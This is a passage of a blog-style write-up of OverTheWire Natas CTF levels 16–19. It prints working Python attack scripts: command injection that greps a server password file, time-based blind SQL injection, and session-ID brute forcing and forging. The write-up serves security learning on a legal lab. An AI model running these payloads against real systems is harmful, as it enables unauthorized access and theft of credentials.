        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">LENGTH</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span>
            <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">CHARS</span><span class="p">)):</span>
                <span class="k">print</span><span class="p">(</span><span class="s">&quot;Position </span><span class="si">%d</span><span class="s">: Trying </span><span class="si">%s</span><span class="s"> ...&quot;</span> <span class="o">%</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">CHARS</span><span class="p">[</span><span class="n">j</span><span class="p">]))</span>
                <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span> <span class="p">(</span> <span class="n">URL1</span> <span class="o">+</span> <span class="n">password</span> <span class="o">+</span> <span class="n">CHARS</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">+</span> <span class="n">URL2</span>  <span class="p">),</span> <span class="n">auth</span><span class="o">=</span><span class="n">AUTH</span><span class="p">)</span>
                <span class="k">if</span> <span class="s">&#39;bananas&#39;</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
                        <span class="n">password</span> <span class="o">+=</span> <span class="n">CHARS</span><span class="p">[</span><span class="n">j</span><span class="p">]</span>
                        <span class="k">print</span><span class="p">(</span><span class="s">&quot;Password so far: &quot;</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span>
                        <span class="k">break</span>
        <span class="k">return</span> <span class="n">password</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">&#39;__main__&#39;</span><span class="p">:</span>
        <span class="c"># authorization: login and password</span>
        <span class="n">AUTH</span> <span class="o">=</span> <span class="p">(</span><span class="s">&#39;natas16&#39;</span><span class="p">,</span> <span class="s">&#39;****************************&#39;</span><span class="p">)</span>

        <span class="c"># BASE64 password and 32 bytes</span>
        <span class="n">CHARS</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="o">.</span><span class="n">digits</span>
        <span class="n">LENGTH</span> <span class="o">=</span> <span class="mi">32</span>

        <span class="c"># crafted url</span>
        <span class="n">URL1</span> <span class="o">=</span> <span class="s">&#39;http://natas16.natas.labs.overthewire.org?needle=$(grep -E ^&#39;</span>
        <span class="n">URL2</span> <span class="o">=</span> <span class="s">&#39;.* /etc/natas_webpass/natas17)banana&amp;submit=Search&#39;</span>

        <span class="k">print</span><span class="p">(</span><span class="n">brute_force_password</span><span class="p">(</span><span class="n">LENGTH</span><span class="p">,</span> <span class="n">AUTH</span><span class="p">,</span> <span class="n">CHARS</span><span class="p">,</span> <span class="n">URL1</span><span class="p">,</span> <span class="n">URL2</span><span class="p">))</span>
</pre></div>


<p>Around 10 minutes later we get our password.</p>
<h3>Level 17: SQL Injection III</h3>
<p>This level starts with a username search similar from the 14th and 15th levels:</p>
<div class="highlight"><pre><span class="cm">/*</span>
<span class="cm">CREATE TABLE `users` (</span>
<span class="cm">  `username` varchar(64) DEFAULT NULL,</span>
<span class="cm">  `password` varchar(64) DEFAULT NULL</span>
<span class="cm">);</span>
<span class="cm">*/</span>
<span class="k">if</span><span class="p">(</span><span class="nx">array_key_exists</span><span class="p">(</span><span class="s2">&quot;username&quot;</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$link</span> <span class="o">=</span> <span class="nx">mysql_connect</span><span class="p">(</span><span class="s1">&#39;localhost&#39;</span><span class="p">,</span> <span class="s1">&#39;natas17&#39;</span><span class="p">,</span> <span class="s1">&#39;&lt;censored&gt;&#39;</span><span class="p">);</span>
    <span class="nx">mysql_select_db</span><span class="p">(</span><span class="s1">&#39;natas17&#39;</span><span class="p">,</span> <span class="nv">$link</span><span class="p">);</span>
    <span class="nv">$query</span> <span class="o">=</span> <span class="s2">&quot;SELECT * from users where username=</span><span class="se">\&quot;</span><span class="s2">&quot;</span><span class="nx">.</span><span class="nv">$_REQUEST</span><span class="err">[</span><span class="s2">&quot;username&quot;</span><span class="cp">]</span>.&quot;\&quot;&quot;;
    if(array_key_exists(&quot;debug&quot;, $_GET)) {
        echo &quot;Executing query: $query<span class="nt">&lt;br&gt;</span>&quot;;
    }
    $res = mysql_query($query, $link);
    if($res) {
    if(mysql_num_rows($res) &gt; 0) {
        //echo &quot;This user exists.<span class="nt">&lt;br&gt;</span>&quot;;
    } else {
        //echo &quot;This user doesn&#39;t exist.<span class="nt">&lt;br&gt;</span>&quot;;
    }
    } else {
        //echo &quot;Error in query.<span class="nt">&lt;br&gt;</span>&quot;;
    }
    mysql_close($link);
} else {
?&gt;
</pre></div>


<p>The difference now is that the echo commands are commented off. We can't use the same method as before to check whether we got a right char in the password.</p>
<p>What other ways we can have binary indicator?</p>
<p>We can play with time!</p>
<h4>Stating the Attack:</h4>
<p>Luckily, MySQL has a query <a href="http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_sleep">sleep()</a> that delays the next command for a number of seconds. We can use this as an inject command in the end of our former exploits:</p>
<div class="highlight"><pre><span class="n">AND</span> <span class="n">SUBSTRING</span><span class="p">(</span><span class="n">password</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">1</span><span class="p">))</span> <span class="n">LIKE</span> <span class="n">BINARY</span> <span class="n">AND</span> <span class="n">SLEEP</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">AND</span> <span class="s">&quot;1&quot;</span><span class="o">=</span><span class="s">&quot;1</span>
</pre></div>


<p>Notice that since SLEEP() does not carry a <strong>"</strong> we use the <em>always true</em> clause to close the <strong>"</strong> added by the server.</p>
<p>A crafted URL should look like this:</p>
<blockquote>
<p>http://natas15.natas.labs.overthewire.org/?username=natas16%22%20AND%20SUBSTRING(password,1,1)%20LIKE%20BINARY%20%22d%22%20AND%20SLEEP(320)%20AND%20%221%22=%221</p>
</blockquote>
<h4>Crafting the Attack:</h4>
<p>The new script is:</p>
<div class="highlight"><pre><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">string</span>

<span class="k">def</span> <span class="nf">brute_force_password</span><span class="p">(</span><span class="n">LENGTH</span><span class="p">,</span> <span class="n">AUTH</span><span class="p">,</span> <span class="n">CHARS</span><span class="p">,</span> <span class="n">SQL_URL1</span><span class="p">,</span> <span class="n">SQL_URL2</span><span class="p">):</span>
        <span class="n">password</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">LENGTH</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span>
            <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">CHARS</span><span class="p">)):</span>
                <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span> <span class="p">(</span> <span class="n">SQL_URL1</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="o">+</span> <span class="n">SQL_URL2</span> <span class="o">+</span> <span class="n">CHARS</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">+</span> <span class="n">SQL_URL3</span> <span class="p">),</span> <span class="n">auth</span><span class="o">=</span><span class="n">AUTH</span><span class="p">)</span>
                <span class="n">time</span> <span class="o">=</span>  <span class="n">r</span><span class="o">.</span><span class="n">elapsed</span><span class="o">.</span><span class="n">total_seconds</span><span class="p">()</span>
                <span class="k">print</span><span class="p">(</span><span class="s">&quot;Position </span><span class="si">%d</span><span class="s">: trying </span><span class="si">%s</span><span class="s">... Time: </span><span class="si">%.3f</span><span class="s">&quot;</span> <span class="o">%</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">CHARS</span><span class="p">[</span><span class="n">j</span><span class="p">],</span> <span class="n">time</span><span class="p">))</span>
                <span class="c">#print r.url</span>
                <span class="k">if</span> <span class="n">time</span> <span class="o">&gt;=</span> <span class="mi">9</span><span class="p">:</span>
                    <span class="n">password</span> <span class="o">+=</span> <span class="n">CHARS</span><span class="p">[</span><span class="n">j</span><span class="p">]</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">&quot;Password so far: &quot;</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span>
                    <span class="k">break</span>
        <span class="k">return</span> <span class="n">password</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">&#39;__main__&#39;</span><span class="p">:</span>
        <span class="c"># authorization: login and password</span>
        <span class="n">AUTH</span> <span class="o">=</span> <span class="p">(</span><span class="s">&#39;natas17&#39;</span><span class="p">,</span> <span class="s">&#39;****************************&#39;</span><span class="p">)</span>

        <span class="c"># BASE64 password and 32 bytes</span>
        <span class="n">CHARS</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="o">.</span><span class="n">digits</span>
        <span class="n">LENGTH</span> <span class="o">=</span> <span class="mi">32</span>

        <span class="c"># crafted url</span>
        <span class="n">SQL_URL1</span> <span class="o">=</span> <span class="s">&#39;http://natas17.natas.labs.overthewire.org?username=natas18&quot; AND SUBSTRING(password,&#39;</span>
        <span class="n">SQL_URL2</span> <span class="o">=</span> <span class="s">&#39;,1) LIKE BINARY &quot;&#39;</span>
        <span class="n">SQL_URL3</span> <span class="o">=</span> <span class="s">&#39;&quot; AND SLEEP(10) AND &quot;1&quot;=&quot;1&#39;</span>

        <span class="k">print</span><span class="p">(</span><span class="n">brute_force_password</span><span class="p">(</span><span class="n">LENGTH</span><span class="p">,</span> <span class="n">AUTH</span><span class="p">,</span> <span class="n">CHARS</span><span class="p">,</span> <span class="n">SQL_URL1</span><span class="p">,</span> <span class="n">SQL_URL2</span><span class="p">))</span>
</pre></div>


<p>Around 15 minutes later I got the password.</p>
<h3>Level 18: Hijacking Session ID</h3>
<p>The 18th level starts with a login form, just like the levels before it. The source code is much more intricate though.</p>
<p>First, we see the declaration of the size of the id. This is important if we want to brute force the solution:</p>
<div class="highlight"><pre><span class="err">$</span><span class="n">maxid</span> <span class="o">=</span> <span class="mi">640</span><span class="p">;</span> <span class="c1">// 640 should be enough for everyone</span>
</pre></div>


<p>Then we have a function that checks whether a variable <em>$id</em> is a number with the PHP function <a href="http://php.net/manual/en/function.is-numeric.php">is_numeric</a>:</p>
<div class="highlight"><pre><span class="kd">function</span> <span class="nx">isValidID</span><span class="p">(</span><span class="nx">$id</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
    <span class="k">return</span> <span class="nx">is_numeric</span><span class="p">(</span><span class="nx">$id</span><span class="p">);</span>
<span class="p">}</span>
</pre></div>


<p>Then we have this main object:</p>
<div class="highlight"><pre><span class="err">$</span><span class="nt">showform</span> <span class="o">=</span> <span class="nt">true</span><span class="o">;</span>
<span class="nt">if</span><span class="o">(</span><span class="nt">my_session_start</span><span class="o">())</span> <span class="p">{</span>
    <span class="n">print_credentials</span><span class="p">();</span>
    <span class="err">$</span><span class="n">showform</span> <span class="o">=</span> <span class="n">false</span><span class="p">;</span>
<span class="p">}</span> <span class="nt">else</span> <span class="p">{</span>
    <span class="n">if</span><span class="p">(</span><span class="n">array_key_exists</span><span class="p">(</span><span class="s2">&quot;username&quot;</span><span class="o">,</span> <span class="err">$</span><span class="n">_REQUEST</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">array_key_exists</span><span class="p">(</span><span class="s2">&quot;password&quot;</span><span class="o">,</span> <span class="err">$</span><span class="n">_REQUEST</span><span class="p">))</span> <span class="err">{</span>
    <span class="n">session_id</span><span class="p">(</span><span class="n">createID</span><span class="p">(</span><span class="err">$</span><span class="n">_REQUEST</span><span class="cp">[</span><span class="s2">&quot;username&quot;</span><span class="cp">]</span><span class="p">));</span>
    <span class="n">session_start</span><span class="p">();</span>
    <span class="err">$</span><span class="n">_SESSION</span><span class="cp">[</span><span class="s2">&quot;admin&quot;</span><span class="cp">]</span> <span class="o">=</span> <span class="n">isValidAdminLogin</span><span class="p">();</span>
    <span class="n">debug</span><span class="p">(</span><span class="s2">&quot;New session started&quot;</span><span class="p">);</span>
    <span class="err">$</span><span class="n">showform</span> <span class="o">=</span> <span class="n">false</span><span class="p">;</span>
    <span class="n">print_credentials</span><span class="p">();</span>
    <span class="p">}</span>
<span class="err">}</span>
<span class="nt">if</span><span class="o">(</span><span class="err">$</span><span class="nt">showform</span><span class="o">)</span> <span class="p">{</span>
<span class="o">?&gt;</span>
</pre></div>


<p>The next function create an random id number with the value defined by <em>$maxid</em>:</p>
<div class="highlight"><pre><span class="x">function createID($user) { /* {{{ */</span>
<span class="x">    global $maxid;</span>
<span class="x">    return rand(1, $maxid);</span>
<span class="x">}</span>
</pre></div>


<p>This checks whether the function <em>my_session_start()</em> is true:</p>
<div class="highlight"><pre><span class="kd">function</span> <span class="nx">my_session_start</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
    <span class="k">if</span><span class="p">(</span><span class="nx">array_key_exists</span><span class="p">(</span><span class="s2">&quot;PHPSESSID&quot;</span><span class="p">,</span> <span class="nx">$_COOKIE</span><span class="p">)</span> <span class="nx">and</span> <span class="nx">isValidID</span><span class="p">(</span><span class="nx">$_COOKIE</span><span class="cp">[</span><span class="s2">&quot;PHPSESSID&quot;</span><span class="cp">]</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nx">session_start</span><span class="p">())</span> <span class="p">{</span>
        <span class="nx">debug</span><span class="p">(</span><span class="s2">&quot;Session start failed&quot;</span><span class="p">);</span>
        <span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="nx">debug</span><span class="p">(</span><span class="s2">&quot;Session start ok&quot;</span><span class="p">);</span>
        <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nx">array_key_exists</span><span class="p">(</span><span class="s2">&quot;admin&quot;</span><span class="p">,</span> <span class="nx">$_SESSION</span><span class="p">))</span> <span class="p">{</span>
        <span class="nx">debug</span><span class="p">(</span><span class="s2">&quot;Session was old: admin flag set&quot;</span><span class="p">);</span>
        <span class="nx">$_SESSION</span><span class="cp">[</span><span class="s2">&quot;admin&quot;</span><span class="cp">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// backwards compatible, secure</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="kc">true</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="kc">false</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>


<p>In the case it's true, a function that prints the credentials is called, printing our password:</p>
<div class="highlight"><pre><span class="nx">function</span> <span class="nx">print_credentials</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
    <span class="k">if</span><span class="p">(</span><span class="nv">$_SESSION</span> <span class="ow">and</span> <span class="nx">array_key_exists</span><span class="p">(</span><span class="s2">&quot;admin&quot;</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">)</span> <span class="ow">and</span> <span class="nv">$_SESSION</span><span class="err">[</span><span class="s2">&quot;admin&quot;</span><span class="cp">]</span> == 1) {
    print &quot;You are an admin. The credentials for the next level are:<span class="nt">&lt;br&gt;</span>&quot;;
    print &quot;<span class="nt">&lt;pre&gt;</span>Username: natas19\n&quot;;
    print &quot;Password: <span class="nt">&lt;censored&gt;&lt;/pre&gt;</span>&quot;;
    } else {
    print &quot;You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.&quot;;
    }
}
</pre></div>


<p>If <em>%my_session</em> is not true, it  will look to the HTTP request and search for username and password. If it finds them, it creates a session id:</p>
<div class="highlight"><pre><span class="kd">function</span> <span class="nx">isValidAdminLogin</span><span class="p">()</span> <span class="p">{</span> <span class="cm">/* {{{ */</span>
    <span class="k">if</span><span class="p">(</span><span class="nx">$_REQUEST</span><span class="cp">[</span><span class="s2">&quot;username&quot;</span><span class="cp">]</span> <span class="o">==</span> <span class="s2">&quot;admin&quot;</span><span class="p">)</span> <span class="p">{</span>
    <span class="cm">/* This method of authentication appears to be unsafe and has been disabled for now. */</span>
        <span class="c1">//return 1;</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</pre></div>


<p>So, in resume, we have a function that starts the session, first checking if the session id is in the cookie and if this session id is a number. If true, it checks if it's a fresh session. Then, it checks if the word <em>admin</em> is in <a href="http://en.wikipedia.org/wiki/Session_ID">SESSION_ID</a>. If not, it invalidates the session.</p>
<p>If the SESSION_ID is the admin session ID, the password for the next is shown.</p>
<p>After that, it calls PHP's <a href="http://php.net/manual/en/function.session-start.php">session_starts()</a>.</p>
<p>The session ID is given by the variable <em>PHPSESSID</em>, and that's what we are going to brute force to get our password.</p>
<p>The variable <a href="http://php.net/manual/en/reserved.variables.request.php">$_REQUEST</a>  is an  array that by default contains the contents of <em>$_GET</em>, <em>$_POST</em> and <em>$_COOKIE</em>.</p>
<h4>Crafting the attack:</h4>
<p>We write the following script:</p>
<div class="highlight"><pre><span class="kn">import</span> <span class="nn">requests</span>

<span class="k">def</span> <span class="nf">brute_force_password</span><span class="p">(</span><span class="n">AUTH</span><span class="p">,</span> <span class="n">URL</span><span class="p">,</span> <span class="n">PAYLOAD</span><span class="p">,</span> <span class="n">MAXID</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">MAXID</span><span class="p">):</span>
        <span class="n">HEADER</span> <span class="o">=</span><span class="p">{</span><span class="s">&#39;Cookie&#39;</span><span class="p">:</span><span class="s">&#39;PHPSESSID=&#39;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)}</span>
        <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">URL</span><span class="p">,</span> <span class="n">auth</span><span class="o">=</span><span class="n">AUTH</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">PAYLOAD</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">HEADER</span><span class="p">)</span>
        <span class="k">if</span> <span class="s">&quot;You are an admin&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">url</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">))</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">&#39;__main__&#39;</span><span class="p">:</span>
    <span class="n">AUTH</span> <span class="o">=</span> <span class="p">(</span><span class="s">&#39;natas18&#39;</span><span class="p">,</span> <span class="s">&#39;*************************&#39;</span><span class="p">)</span>
    <span class="n">URL</span> <span class="o">=</span> <span class="s">&#39;http://natas18.natas.labs.overthewire.org/index.php?&#39;</span>

    <span class="n">PAYLOAD</span> <span class="o">=</span> <span class="p">({</span><span class="s">&#39;debug&#39;</span><span class="p">:</span> <span class="s">&#39;1&#39;</span><span class="p">,</span> <span class="s">&#39;username&#39;</span><span class="p">:</span> <span class="s">&#39;user&#39;</span><span class="p">,</span> <span class="s">&#39;password&#39;</span><span class="p">:</span> <span class="s">&#39;pass&#39;</span><span class="p">})</span>
    <span class="n">MAXID</span> <span class="o">=</span> <span class="mi">640</span>

    <span class="n">brute_force_password</span><span class="p">(</span><span class="n">AUTH</span><span class="p">,</span> <span class="n">URL</span><span class="p">,</span> <span class="n">PAYLOAD</span><span class="p">,</span> <span class="n">MAXID</span><span class="p">)</span>
</pre></div>


<p>After a few minutes, we get our password.</p>
<h3>Level 19: Hijacking Session ID II</h3>
<p>This level looks exactly like the previous except that it has the following message:</p>
<blockquote>
<p>This page uses mostly the same code as the previous level, but session IDs are no longer sequential...</p>
</blockquote>
<p><img alt="" src="http://i.imgur.com/OQ7LATt.png" /></p>
<p>This time we have no access to the source code to see how the session IDs are created. However, we have access to the values in the cookie which are created by the session.</p>
<p>We write the following snippet:</p>
<div class="highlight"><pre><span class="n">HEADER</span> <span class="o">=</span><span class="p">{</span><span class="s">&#39;Cookie&#39;</span><span class="p">:</span><span class="s">&#39;PHPSESSID=&#39;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)}</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">URL</span><span class="p">,</span> <span class="n">auth</span><span class="o">=</span><span class="n">AUTH</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">PAYLOAD</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">HEADER</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">HEADER</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
</pre></div>


<p>This produces the following output:</p>
<div class="highlight"><pre><span class="mi">0</span>
<span class="p">{</span><span class="err">&#39;</span><span class="n">PHPSESSID</span><span class="err">&#39;</span><span class="o">:</span> <span class="err">&#39;</span><span class="mi">3236312</span><span class="n">d75736572</span><span class="err">&#39;</span><span class="p">}</span>
<span class="mi">1</span>
<span class="p">{</span><span class="err">&#39;</span><span class="n">PHPSESSID</span><span class="err">&#39;</span><span class="o">:</span> <span class="err">&#39;</span><span class="mi">3136372</span><span class="n">d75736572</span><span class="err">&#39;</span><span class="p">}</span>
<span class="mi">2</span>
<span class="p">{</span><span class="err">&#39;</span><span class="n">PHPSESSID</span><span class="err">&#39;</span><span class="o">:</span> <span class="err">&#39;</span><span class="mi">3534342</span><span class="n">d75736572</span><span class="err">&#39;</span><span class="p">}</span>
<span class="mi">3</span>
<span class="p">{</span><span class="err">&#39;</span><span class="n">PHPSESSID</span><span class="err">&#39;</span><span class="o">:</span> <span class="err">&#39;</span><span class="mi">3238352</span><span class="n">d75736572</span><span class="err">&#39;</span><span class="p">}</span>
<span class="mi">4</span>
<span class="p">{</span><span class="err">&#39;</span><span class="n">PHPSESSID</span><span class="err">&#39;</span><span class="o">:</span> <span class="err">&#39;</span><span class="mi">3334332</span><span class="n">d75736572</span><span class="err">&#39;</span><span class="p">}</span>
<span class="p">(...)</span>
</pre></div>


<p>So the session ID is an hexadecimal number. Let's decode it:</p>
<div class="highlight"><pre><span class="n">id_hex</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">utils</span><span class="o">.</span><span class="n">dict_from_cookiejar</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">cookies</span><span class="p">)[</span><span class="s">&#39;PHPSESSID&#39;</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="n">id_hex</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&#39;hex&#39;</span><span class="p">))</span>
</pre></div>


<p>Mmmm, interesting:</p>
<div class="highlight"><pre><span class="mi">0</span>
<span class="mi">548</span><span class="o">-</span><span class="n">user</span>
<span class="mi">1</span>
<span class="mi">275</span><span class="o">-</span><span class="n">user</span>
<span class="mi">2</span>
<span class="mi">237</span><span class="o">-</span><span class="n">user</span>
<span class="mi">3</span>
<span class="mi">90</span><span class="o">-</span><span class="n">user</span>
<span class="mi">4</span>
<span class="mi">535</span><span class="o">-</span><span class="n">user</span>
<span class="p">(...)</span>
</pre></div>


<p>The session ID is really a random number (below 640) attached to the given username. That's easy.</p>
<h4>Crafting the attack:</h4>
<p>We write the following script:</p>
<div class="highlight"><pre><span class="kn">import</span> <span class="nn">requests</span>

<span class="k">def</span> <span class="nf">brute_force_password</span><span class="p">(</span><span class="n">AUTH</span><span class="p">,</span> <span class="n">URL</span><span class="p">,</span> <span class="n">PAYLOAD</span><span class="p">,</span> <span class="n">MAXID</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">MAXID</span><span class="p">):</span>
        <span class="n">HEADER</span> <span class="o">=</span><span class="p">{</span><span class="s">&#39;Cookie&#39;</span><span class="p">:</span><span class="s">&#39;PHPSESSID=&#39;</span> <span class="o">+</span> <span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="o">+</span> <span class="s">&#39;-admin&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">&#39;hex&#39;</span><span class="p">)}</span>
        <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">URL</span><span class="p">,</span> <span class="n">auth</span><span class="o">=</span><span class="n">AUTH</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">PAYLOAD</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">HEADER</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
        <span class="k">if</span> <span class="s">&quot;You are an admin&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">text</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">url</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">&#39;__main__&#39;</span><span class="p">:</span>

    <span class="n">AUTH</span> <span class="o">=</span> <span class="p">(</span><span class="s">&#39;natas19&#39;</span><span class="p">,</span> <span class="s">&#39;***********************&#39;</span><span class="p">)</span>
    <span class="n">URL</span> <span class="o">=</span> <span class="s">&#39;http://natas19.natas.labs.overthewire.org/index.php?&#39;</span>

    <span class="n">PAYLOAD</span> <span class="o">=</span> <span class="p">({</span><span class="s">&#39;debug&#39;</span><span class="p">:</span> <span class="s">&#39;1&#39;</span><span class="p">,</span> <span class="s">&#39;username&#39;</span><span class="p">:</span> <span class="s">&#39;admin&#39;</span><span class="p">,</span> <span class="s">&#39;password&#39;</span><span class="p">:</span> <span class="s">&#39;pass&#39;</span><span class="p">})</span>
    <span class="n">MAXID</span> <span class="o">=</span> <span class="mi">640</span>

    <span class="n">brute_force_password</span><span class="p">(</span><span class="n">AUTH</span><span class="p">,</span> <span class="n">URL</span><span class="p">,</span> <span class="n">PAYLOAD</span><span class="p">,</span> <span class="n">MAXID</span><span class="p">)</span>
</pre></div>


<p>And we get our password in the 501th attempt. Awesome.</p>
<hr />
<p>That's it. The <a href="https://github.com/bt3gl/CTFs-Gray-Hacker-and-PenTesting/tree/master/Web_Exploits">source code is available</a> as usual.</p>
<p>Hack all the things!</p>
                </div><!-- /.entry-content -->
                <div class="comments">
                <h2>Comments !</h2>
                        <div id="disqus_thread"></div>
                        <script type="text/javascript">
                           var disqus_identifier = "exploiting-the-web-in-20-lessons-natas.html";
                           (function() {
                                var dsq = document.createElement('script');
                                dsq.type = 'text/javascript'; dsq.async = true;
                                dsq.src = 'http://bt3gl.disqus.com/embed.js';
                                (document.getElementsByTagName('head')[0] ||
                                 document.getElementsByTagName('body')[0]).appendChild(dsq);
                          })();
                        </script>
                </div>
        </article>
</section>
        </div><!--/span-->


      </div><!--/row-->



      <footer>
        <address id="about">

        </address><!-- /#about -->

      </footer>

    </div><!--/.fluid-container-->


    <script src="./theme/js/jquery-1.7.2.min.js"></script>
    <script src="./theme/js/bootstrap.min.js"></script>
  </body>
</html>